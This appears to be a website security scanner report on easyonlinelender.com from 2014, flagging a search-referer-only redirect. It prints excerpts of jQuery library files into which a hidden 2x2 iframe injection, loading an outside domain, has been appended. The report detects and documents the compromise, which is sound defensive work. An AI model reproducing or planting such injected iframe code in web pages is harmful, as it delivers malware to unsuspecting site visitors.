Malicious/Suspicious Redirects
URL: http://easyonlinelender.com/ (imitation of visitor from search engine)
Status: malicious

Request:
GET / HTTP/1.1
Host: easyonlinelender.com
Referer: http://www.google.com/search?q=redirect+check1

Server response:
HTTP/1.1 302 Found
Connection: close
Date: Sun, 07 Sep 2014 17:25:11 GMT
Location: http://elyisus.com/hmod.html
Server: Apache
Content-Length: 212
Content-Type: text/html; charset=iso-8859-1
Scanned pages/files
Request | Server response | Status |
http://easyonlinelender.com/ | 200 OK Content-Length: 10105 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>
http://www.buysmartdomains.com/includes/jquery-1.3.2.min.js | 200 OK Content-Length: 57398 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html></iframe>');
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>
http://www.buysmartdomains.com/includes/jquery.validate.min.js | 200 OK Content-Length: 24665 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function($){$.extend($.fn,{validate:function(options){if(!this.length){options&&options.debug&&window.console&&console.warn("nothing selected, can't validate, returning nothing");return;}var validator=$.data(this[0],'validator');if(validator){return validator;}validator=new $.validator(options,this[0]);$.data(this[0],'validator',validator);if(validator.settings.onsubmit){this.find("input, button").filter(".cancel").click(function(){validator.cancelSubmit=true;});this.sub
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http:
Antivirus reports:
Hidden iFrame found. size: 2x2 src: http://elyisus.com/hmod.html
<iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://elyisus.com/hmod.html>
http://easyonlinelender.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=easyonlinelender.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://easyonlinelender.com/
Result: easyonlinelender.com is not infected or malware details are not published yet.